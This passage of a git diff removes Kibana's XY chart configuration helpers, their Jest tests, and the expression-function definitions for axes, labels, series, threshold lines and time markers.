groupId = axis.id; - - const grid = isCategoryAxis - ? { - show: categoryLines, - } - : { - show: valueAxis === axis.id, - }; - // Date range formatter applied on xAccessor - const tickFormatter = - aggType === BUCKET_TYPES.DATE_RANGE || aggType === BUCKET_TYPES.RANGE ? identity : formatter; - const ticks: TickOptions = { - formatter: tickFormatter, - labelFormatter: getLabelFormatter(labels.truncate, tickFormatter), - show: labels.show, - rotation: labels.rotate, - showOverlappingLabels: !labels.filter, - showDuplicates: !labels.filter, - }; - const scale = getScale(axisScale, params, format, isCategoryAxis); - const title = axisTitle.text || fallbackTitle; - const fallbackRotation = - isCategoryAxis && isDateHistogram ? LabelRotation.Horizontal : LabelRotation.Vertical; - - return { - ...axis, - show, - groupId, - title, - ticks, - grid, - scale, - style: getAxisStyle(useMultiLayerTimeAxis, darkMode, ticks, title, fallbackRotation), - domain: getAxisDomain(scale, isCategoryAxis), - integersOnly: aggType === 'count', - timeAxisLayerCount: useMultiLayerTimeAxis ? 3 : 0, - }; -} - -function getLabelFormatter( - truncate?: number | null, - formatter?: TickFormatter -): TickFormatter | undefined { - if (truncate === null || truncate === undefined) { - return formatter; - } - - return (value: any) => { - const finalValue = `${formatter ? formatter(value) : value}`; - - if (finalValue.length > truncate) { - return `${finalValue.slice(0, truncate)}...`; - } - - return finalValue; - }; -} - -function getScaleType( - scale?: Scale, - isNumber?: boolean, - isTime = false, - isHistogram = false -): ECScaleType | undefined { - if (isTime) return ECScaleType.Time; - if (isHistogram) return ECScaleType.Linear; - - if (!isNumber) { - return ECScaleType.Ordinal; - } - - const type = scale?.type; - if (type === ScaleType.SquareRoot) { - return ECScaleType.Sqrt; - } - - return type; -} - -export function getScale( - scale: Scale, - params: Aspect['params'], - format: Aspect['format'], - isCategoryAxis: boolean -): ScaleConfig { - const type = ( - isCategoryAxis - ? getScaleType( - scale, - format?.id === 'number' || - (format?.params?.id === 'number' && - format?.id !== BUCKET_TYPES.RANGE && - format?.id !== BUCKET_TYPES.TERMS), - 'date' in params, - 'interval' in params - ) - : getScaleType(scale, true) - ) as S; - - return { - ...scale, - type, - }; -} - -function getAxisStyle( - isMultiLayerTimeAxis: boolean, - darkMode: boolean, - ticks?: TickOptions, - title?: string, - rotationFallback: LabelRotation = LabelRotation.Vertical -): AxisSpec['style'] { - return isMultiLayerTimeAxis - ? { - ...MULTILAYER_TIME_AXIS_STYLE, - tickLabel: { - ...MULTILAYER_TIME_AXIS_STYLE.tickLabel, - visible: Boolean(ticks?.show), - }, - tickLine: { - ...MULTILAYER_TIME_AXIS_STYLE.tickLine, - visible: Boolean(ticks?.show), - }, - axisTitle: { - visible: (title ?? '').trim().length > 0, - }, - } - : { - axisTitle: { - visible: (title ?? '').trim().length > 0, - }, - tickLabel: { - visible: Boolean(ticks?.show), - rotation: -(ticks?.rotation ?? rotationFallback), - }, - }; -} - -function getAxisDomain( - scale: ScaleConfig, - isCategoryAxis: boolean -): YDomainRange | undefined { - if (isCategoryAxis || !scale) { - return; - } - - const { min, max, defaultYExtents, boundsMargin } = scale; - const fit = defaultYExtents; - const padding = boundsMargin || undefined; - - return { fit, padding, min: min ?? NaN, max: max ?? NaN }; -} diff --git a/src/plugins/vis_types/xy/public/config/get_config.test.ts b/src/plugins/vis_types/xy/public/config/get_config.test.ts deleted file mode 100644 index 7608ef7cda460..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_config.test.ts +++ /dev/null @@ -1,107 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getConfig } from './get_config'; -import { visData, visDataPercentile, visParamsWithTwoYAxes } from '../mocks'; -import { VisParams } from '../types'; - -// ToDo: add more tests for all the config properties -describe('getConfig', () => { - it('identifies it as a timeChart if the x axis has a date field', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.isTimeChart).toBe(true); - }); - - it('not adds the current time marker if the param is set to false', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.showCurrentTime).toBe(false); - }); - - it('adds the current time marker if the param is set to false', () => { - const newVisParams = { - ...visParamsWithTwoYAxes, - addTimeMarker: true, - }; - const config = getConfig(visData, newVisParams); - expect(config.showCurrentTime).toBe(true); - }); - - it('enables the histogram mode for a date_histogram', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.enableHistogramMode).toBe(true); - }); - - it('assigns the correct formatter per y axis', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.yAxes.length).toBe(2); - expect(config.yAxes[0].ticks?.formatter).toStrictEqual(config.aspects.y[0].formatter); - expect(config.yAxes[1].ticks?.formatter).toStrictEqual(config.aspects.y[1].formatter); - }); - - it('assigns the correct number of yAxes if the agg is hidden', () => { - // We have two axes but the one y dimension is hidden - const newVisParams = { - ...visParamsWithTwoYAxes, - dimensions: { - ...visParamsWithTwoYAxes.dimensions, - y: [ - { - label: 'Average memory', - aggType: 'avg', - params: {}, - accessor: 1, - format: { - id: 'number', - params: {}, - }, - }, - ], - }, - }; - const config = getConfig(visData, newVisParams); - expect(config.yAxes.length).toBe(1); - }); - - it('assigns the correct number of yAxes if the agg is Percentile', () => { - const newVisParams = { - ...visParamsWithTwoYAxes, - seriesParams: [ - { - type: 'line', - data: { - label: 'Percentiles of bytes', - id: '1', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - lineWidth: 2, - mode: 'normal', - show: true, - showCircles: true, - circlesRadius: 3, - valueAxis: 'ValueAxis-1', - }, - ], - dimensions: { - ...visParamsWithTwoYAxes.dimensions, - y: ['1st', '5th', '25th', '50th', '75th', '95th', '99th'].map((prefix, accessor) => ({ - label: `${prefix} percentile of bytes`, - aggType: 'percentiles', - params: {}, - accessor, - format: { - id: 'number', - params: {}, - }, - })), - }, - } as VisParams; - const config = getConfig(visDataPercentile, newVisParams); - expect(config.yAxes.length).toBe(1); - }); -}); diff --git a/src/plugins/vis_types/xy/public/config/get_config.ts b/src/plugins/vis_types/xy/public/config/get_config.ts deleted file mode 100644 index 1a78b65f19f33..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_config.ts +++ /dev/null @@ -1,146 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Fit, ScaleContinuousType } from '@elastic/charts'; - -import { Datatable } from '@kbn/expressions-plugin/public'; -import { BUCKET_TYPES } from '@kbn/data-plugin/public'; -import { DateHistogramParams } from '@kbn/visualizations-plugin/public'; - -import { - Aspect, - AxisConfig, - SeriesParam, - VisConfig, - VisParams, - XScaleType, - YScaleType, -} from '../types'; -import { getThresholdLine } from './get_threshold_line'; -import { getRotation } from './get_rotation'; -import { getTooltip } from './get_tooltip'; -import { getLegend } from './get_legend'; -import { getAxis } from './get_axis'; -import { getAspects } from './get_aspects'; -import { ChartType } from '..'; -import { getSafeId } from '../utils/accessors'; - -export function getConfig( - table: Datatable, - params: VisParams, - useLegacyTimeAxis = false, - darkMode = false -): VisConfig { - const { - thresholdLine, - orderBucketsBySum, - addTimeMarker, - radiusRatio, - labels, - fittingFunction, - detailedTooltip, - isVislibVis, - fillOpacity, - } = params; - const aspects = getAspects(table.columns, params.dimensions); - const tooltip = getTooltip(aspects, params); - - const yAxes: Array> = []; - - // avoid duplicates based on aggId - const aspectVisited = new Set(); - params.dimensions.y.forEach((y) => { - const accessor = y.accessor; - const aspect = aspects.y.find(({ column }) => column === accessor); - const aggId = getSafeId(aspect?.aggId); - const serie = params.seriesParams.find(({ data: { id } }) => id === aggId); - const valueAxis = params.valueAxes.find(({ id }) => id === serie?.valueAxis); - if (aspect && valueAxis && !aspectVisited.has(aggId)) { - yAxes.push(getAxis(valueAxis, params.grid, aspect, params.seriesParams)); - aspectVisited.add(aggId); - } - }); - - const rotation = getRotation(params.categoryAxes[0]); - - const isDateHistogram = params.dimensions.x?.aggType === BUCKET_TYPES.DATE_HISTOGRAM; - const isHistogram = params.dimensions.x?.aggType === BUCKET_TYPES.HISTOGRAM; - const enableHistogramMode = - (isDateHistogram || isHistogram) && - shouldEnableHistogramMode(params.seriesParams, aspects.y, yAxes); - - const useMultiLayerTimeAxis = - enableHistogramMode && isDateHistogram && !useLegacyTimeAxis && rotation === 0; - - const xAxis = getAxis( - params.categoryAxes[0], - params.grid, - aspects.x, - params.seriesParams, - isDateHistogram, - useMultiLayerTimeAxis, - darkMode - ); - - const isTimeChart = (aspects.x.params as DateHistogramParams).date ?? false; - - return { - // NOTE: downscale ratio to match current vislib implementation - markSizeRatio: radiusRatio * 0.6, - fittingFunction: fittingFunction ?? Fit.Linear, - fillOpacity, - detailedTooltip, - orderBucketsBySum, - isTimeChart, - isVislibVis, - showCurrentTime: addTimeMarker && isTimeChart, - showValueLabel: labels.show ?? false, - enableHistogramMode, - tooltip, - aspects, - xAxis, - yAxes, - legend: getLegend(params), - rotation, - thresholdLine: getThresholdLine(thresholdLine, yAxes, params.seriesParams), - }; -} - -/** - * disables histogram mode for any config that has non-stacked clustered bars - * - * @param seriesParams - * @param yAspects - * @param yAxes - */ -const shouldEnableHistogramMode = ( - seriesParams: SeriesParam[], - yAspects: Aspect[], - yAxes: Array> -): boolean => { - const bars = seriesParams.filter(({ type, data: { id: paramId } }) => { - return ( - type === ChartType.Histogram && yAspects.find(({ aggId }) => aggId === paramId) !== undefined - ); - }); - - const groupIds = [ - ...bars.reduce>((acc, { valueAxis: groupId, mode }) => { - acc.add(groupId); - return acc; - }, new Set()), - ]; - - if (groupIds.length > 1) { - return false; - } - - return bars.every(({ valueAxis: groupId, mode }) => { - return mode === 'stacked'; - }); -}; diff --git a/src/plugins/vis_types/xy/public/config/get_legend.ts b/src/plugins/vis_types/xy/public/config/get_legend.ts deleted file mode 100644 index 9a1c9e4bc9c58..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_legend.ts +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { LegendOptions, VisParams } from '../types'; - -export function getLegend({ addLegend, legendPosition }: VisParams): LegendOptions { - return { - show: addLegend, - position: legendPosition, - }; -} diff --git a/src/plugins/vis_types/xy/public/config/get_rotation.ts b/src/plugins/vis_types/xy/public/config/get_rotation.ts deleted file mode 100644 index 44c6a46357eb1..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_rotation.ts +++ /dev/null @@ -1,19 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Rotation } from '@elastic/charts'; - -import { CategoryAxis } from '../types'; - -export function getRotation({ position }: CategoryAxis): Rotation { - if (position === 'left' || position === 'right') { - return 90; - } - - return 0; -} diff --git a/src/plugins/vis_types/xy/public/config/get_threshold_line.ts b/src/plugins/vis_types/xy/public/config/get_threshold_line.ts deleted file mode 100644 index 64eb7e5e24a80..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_threshold_line.ts +++ /dev/null @@ -1,44 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - ThresholdLineConfig, - ThresholdLine, - ThresholdLineStyle, - AxisConfig, - SeriesParam, - YScaleType, -} from '../types'; - -export function getThresholdLine( - { style, ...rest }: ThresholdLine, - yAxes: Array>, - seriesParams: SeriesParam[] -): ThresholdLineConfig { - const groupId = yAxes.find(({ id }) => - seriesParams.some(({ valueAxis }) => id === valueAxis) - )?.groupId; - - return { - ...rest, - dash: getDash(style), - groupId, - }; -} - -function getDash(style: ThresholdLineStyle): number[] | undefined { - switch (style) { - case ThresholdLineStyle.Dashed: - return [10, 5]; - case ThresholdLineStyle.DotDashed: - return [20, 5, 5, 5]; - case ThresholdLineStyle.Full: - default: - return; - } -} diff --git a/src/plugins/vis_types/xy/public/config/get_tooltip.ts b/src/plugins/vis_types/xy/public/config/get_tooltip.ts deleted file mode 100644 index 69961cbed7699..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_tooltip.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { TooltipType } from '@elastic/charts'; - -import { Aspects, VisParams, TooltipConfig } from '../types'; -import { getDetailedTooltip } from '../components/detailed_tooltip'; - -export function getTooltip( - aspects: Aspects, - { addTooltip, detailedTooltip }: VisParams -): TooltipConfig { - return { - type: addTooltip ? TooltipType.VerticalCursor : TooltipType.None, - detailedTooltip: detailedTooltip ? getDetailedTooltip(aspects) : undefined, - }; -} diff --git a/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts b/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts deleted file mode 100644 index 5283a54e57f30..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { CategoryAxis } from '../types'; -import type { ExpressionValueScale } from './vis_scale'; -import type { ExpressionValueLabel } from './label'; - -export interface Arguments extends Omit { - title?: string; - scale: ExpressionValueScale; - labels: ExpressionValueLabel; -} - -export type ExpressionValueCategoryAxis = ExpressionValueBoxed< - 'category_axis', - { - id: CategoryAxis['id']; - show: CategoryAxis['show']; - position: CategoryAxis['position']; - axisType: CategoryAxis['type']; - title: { - text?: string; - }; - labels: CategoryAxis['labels']; - scale: CategoryAxis['scale']; - } ->; - -export const categoryAxis = (): ExpressionFunctionDefinition< - 'categoryaxis', - Datatable | null, - Arguments, - ExpressionValueCategoryAxis -> => ({ - name: 'categoryaxis', - help: i18n.translate('visTypeXy.function.categoryAxis.help', { - defaultMessage: 'Generates category axis object', - }), - type: 'category_axis', - args: { - id: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.id.help', { - defaultMessage: 'Id of category axis', - }), - required: true, - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.categoryAxis.show.help', { - defaultMessage: 'Show the category axis', - }), - required: true, - }, - position: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.position.help', { - defaultMessage: 'Position of the category axis', - }), - required: true, - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.type.help', { - defaultMessage: 'Type of the category axis. Can be category or value', - }), - required: true, - }, - title: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.title.help', { - defaultMessage: 'Title of the category axis', - }), - }, - scale: { - types: ['vis_scale'], - help: i18n.translate('visTypeXy.function.categoryAxis.scale.help', { - defaultMessage: 'Scale config', - }), - }, - labels: { - types: ['label'], - help: i18n.translate('visTypeXy.function.categoryAxis.labels.help', { - defaultMessage: 'Axis label config', - }), - }, - }, - fn: (context, args) => { - return { - type: 'category_axis', - id: args.id, - show: args.show, - position: args.position, - axisType: args.type, - title: { - text: args.title, - }, - scale: { - ...args.scale, - type: args.scale.scaleType, - }, - labels: args.labels, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/index.ts b/src/plugins/vis_types/xy/public/expression_functions/index.ts deleted file mode 100644 index 4d6b2305a3651..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/index.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { visTypeXyVisFn } from './xy_vis_fn'; - -export type { ExpressionValueCategoryAxis } from './category_axis'; -export { categoryAxis } from './category_axis'; -export type { ExpressionValueTimeMarker } from './time_marker'; -export { timeMarker } from './time_marker'; -export type { ExpressionValueValueAxis } from './value_axis'; -export { valueAxis } from './value_axis'; -export type { ExpressionValueSeriesParam } from './series_param'; -export { seriesParam } from './series_param'; -export type { ExpressionValueThresholdLine } from './threshold_line'; -export { thresholdLine } from './threshold_line'; -export type { ExpressionValueLabel } from './label'; -export { label } from './label'; -export type { ExpressionValueScale } from './vis_scale'; -export { visScale } from './vis_scale'; diff --git a/src/plugins/vis_types/xy/public/expression_functions/label.ts b/src/plugins/vis_types/xy/public/expression_functions/label.ts deleted file mode 100644 index cd3eea2b68bc7..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/label.ts +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { Labels } from '@kbn/charts-plugin/public'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; - -export type ExpressionValueLabel = ExpressionValueBoxed< - 'label', - { - color?: Labels['color']; - filter?: Labels['filter']; - overwriteColor?: Labels['overwriteColor']; - rotate?: Labels['rotate']; - show?: Labels['show']; - truncate?: Labels['truncate']; - } ->; - -export const label = (): ExpressionFunctionDefinition< - 'label', - Datatable | null, - Labels, - ExpressionValueLabel -> => ({ - name: 'label', - help: i18n.translate('visTypeXy.function.label.help', { - defaultMessage: 'Generates label object', - }), - type: 'label', - args: { - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.label.color.help', { - defaultMessage: 'Color of label', - }), - }, - filter: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.filter.help', { - defaultMessage: 'Hides overlapping labels and duplicates on axis', - }), - }, - overwriteColor: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.overwriteColor.help', { - defaultMessage: 'Overwrite color', - }), - }, - rotate: { - types: ['number'], - help: i18n.translate('visTypeXy.function.label.rotate.help', { - defaultMessage: 'Rotate angle', - }), - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.show.help', { - defaultMessage: 'Show label', - }), - }, - truncate: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.label.truncate.help', { - defaultMessage: 'The number of symbols before truncating', - }), - }, - }, - fn: (context, args) => { - return { - type: 'label', - color: args.color, - filter: args.hasOwnProperty('filter') ? args.filter : undefined, - overwriteColor: args.overwriteColor, - rotate: args.rotate, - show: args.show, - truncate: args.truncate, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/series_param.ts b/src/plugins/vis_types/xy/public/expression_functions/series_param.ts deleted file mode 100644 index df5ed2ec0d9b4..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/series_param.ts +++ /dev/null @@ -1,136 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { SeriesParam } from '../types'; - -export interface Arguments extends Omit { - label: string; - id: string; -} - -export type ExpressionValueSeriesParam = ExpressionValueBoxed< - 'series_param', - { - data: { label: string; id: string }; - drawLinesBetweenPoints?: boolean; - interpolate?: SeriesParam['interpolate']; - lineWidth?: number; - mode: SeriesParam['mode']; - show: boolean; - showCircles: boolean; - circlesRadius: number; - seriesParamType: SeriesParam['type']; - valueAxis: string; - } ->; - -export const seriesParam = (): ExpressionFunctionDefinition< - 'seriesparam', - Datatable, - Arguments, - ExpressionValueSeriesParam -> => ({ - name: 'seriesparam', - help: i18n.translate('visTypeXy.function.seriesparam.help', { - defaultMessage: 'Generates series param object', - }), - type: 'series_param', - inputTypes: ['datatable'], - args: { - label: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.label.help', { - defaultMessage: 'Name of series param', - }), - required: true, - }, - id: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.id.help', { - defaultMessage: 'Id of series param', - }), - required: true, - }, - drawLinesBetweenPoints: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.drawLinesBetweenPoints.help', { - defaultMessage: 'Draw lines between points', - }), - }, - interpolate: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.interpolate.help', { - defaultMessage: 'Interpolate mode. Can be linear, cardinal or step-after', - }), - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.show.help', { - defaultMessage: 'Show param', - }), - required: true, - }, - lineWidth: { - types: ['number'], - help: i18n.translate('visTypeXy.function.seriesParam.lineWidth.help', { - defaultMessage: 'Width of line', - }), - }, - mode: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.mode.help', { - defaultMessage: 'Chart mode. Can be stacked or percentage', - }), - }, - showCircles: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.showCircles.help', { - defaultMessage: 'Show circles', - }), - }, - circlesRadius: { - types: ['number'], - help: i18n.translate('visTypeXy.function.seriesParam.circlesRadius.help', { - defaultMessage: 'Defines the circles size (radius)', - }), - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.type.help', { - defaultMessage: 'Chart type. Can be line, area or histogram', - }), - }, - valueAxis: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.valueAxis.help', { - defaultMessage: 'Name of value axis', - }), - }, - }, - fn: (context, args) => { - return { - type: 'series_param', - data: { label: args.label, id: args.id }, - drawLinesBetweenPoints: args.drawLinesBetweenPoints, - interpolate: args.interpolate, - lineWidth: args.lineWidth, - mode: args.mode, - show: args.show, - showCircles: args.showCircles, - circlesRadius: args.circlesRadius, - seriesParamType: args.type, - valueAxis: args.valueAxis, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts b/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts deleted file mode 100644 index 9a496158bf5a7..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts +++ /dev/null @@ -1,86 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { ThresholdLine } from '../types'; - -export type ExpressionValueThresholdLine = ExpressionValueBoxed< - 'threshold_line', - { - show: ThresholdLine['show']; - value: ThresholdLine['value']; - width: ThresholdLine['width']; - style: ThresholdLine['style']; - color: ThresholdLine['color']; - } ->; - -export const thresholdLine = (): ExpressionFunctionDefinition< - 'thresholdline', - Datatable | null, - ThresholdLine, - ExpressionValueThresholdLine -> => ({ - name: 'thresholdline', - help: i18n.translate('visTypeXy.function.thresholdLine.help', { - defaultMessage: 'Generates threshold line object', - }), - type: 'threshold_line', - args: { - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.thresholdLine.show.help', { - defaultMessage: 'Show threshould line', - }), - required: true, - }, - value: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.thresholdLine.value.help', { - defaultMessage: 'Threshold value', - }), - required: true, - }, - width: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.thresholdLine.width.help', { - defaultMessage: 'Width of threshold line', - }), - required: true, - }, - style: { - types: ['string'], - help: i18n.translate('visTypeXy.function.thresholdLine.style.help', { - defaultMessage: 'Style of threshold line. Can be full, dashed or dot-dashed', - }), - required: true, - }, - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.thresholdLine.color.help', { - defaultMessage: 'Color of threshold line', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'threshold_line', - show: args.show, - value: args.value, - width: args.width, - style: args.style, - color: args.color, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts b/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts deleted file mode 100644 index f3b8e9cdc61d0..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts +++ /dev/null @@ -1,82 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { TimeMarker } from '../types'; - -export type ExpressionValueTimeMarker = ExpressionValueBoxed< - 'time_marker', - { - time: string; - class?: string; - color?: string; - opacity?: number; - width?: number; - } ->; - -export const timeMarker = (): ExpressionFunctionDefinition< - 'timemarker', - Datatable | null, - TimeMarker, - ExpressionValueTimeMarker -> => ({ - name: 'timemarker', - help: i18n.translate('visTypeXy.function.timemarker.help', { - defaultMessage: 'Generates time marker object', - }), - type: 'time_marker', - args: { - time: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.time.help', { - defaultMessage: 'Exact Time', - }), - required: true, - }, - class: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.class.help', { - defaultMessage: 'Css class name', - }), - }, - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.timeMarker.color.help', { - defaultMessage: 'Color of time marker', - }), - }, - opacity: { - types: ['number'], - help: i18n.translate('visTypeXy.function.timeMarker.opacity.help', { - defaultMessage: 'Opacity of time marker', - }), - }, - width: { - types: ['number'], - help: i18n.translate('visTypeXy.function.timeMarker.width.help', { - defaultMessage: 'Width of time marker', - }), - }, - }, - fn: (context, args) => { - return { - type: 'time_marker', - time: args.time, - class: args.class, - color: args.color, - opacity: args.opacity, - width: args.width, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts b/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts deleted file mode 100644 index 8b32084d8b588..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/value_axis.ts +++ /dev/null @@ -1,79 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { ExpressionValueCategoryAxis } from './category_axis'; -import type { CategoryAxis } from '../types'; - -interface Arguments { - name: string; - axisParams: ExpressionValueCategoryAxis; -} - -export type ExpressionValueValueAxis = ExpressionValueBoxed< - 'value_axis', - { - name: string; - id: string; - show: boolean; - position: CategoryAxis['position']; - axisType: CategoryAxis['type']; - title: { - text?: string; - }; - labels: CategoryAxis['labels']; - scale: CategoryAxis['scale']; - } ->; - -export const valueAxis = (): ExpressionFunctionDefinition< - 'valueaxis', - Datatable | null, - Arguments, - ExpressionValueValueAxis -> => ({ - name: 'valueaxis', - help: i18n.translate('visTypeXy.function.valueaxis.help', { - defaultMessage: 'Generates value axis object', - }), - type: 'value_axis', - args: { - name: { - types: ['string'], - help: i18n.translate('visTypeXy.function.valueAxis.name.help', { - defaultMessage: 'Name of value axis', - }), - required: true, - }, - axisParams: { - types: ['category_axis'], - help: i18n.translate('visTypeXy.function.valueAxis.axisParams.help', { - defaultMessage: 'Value axis params', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'value_axis', - name: args.name, - id: args.axisParams.id, - show: args.axisParams.show, - position: args.axisParams.position, - axisType: args.axisParams.axisType, - title: args.axisParams.title, - scale: args.axisParams.scale, - labels: args.axisParams.labels, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts b/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts deleted file mode 100644 index 33952473e5916..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/vis_scale.ts +++ /dev/null @@ -1,98 +0,0 @@ -/* - * Copyright Elasticsearch B.V. 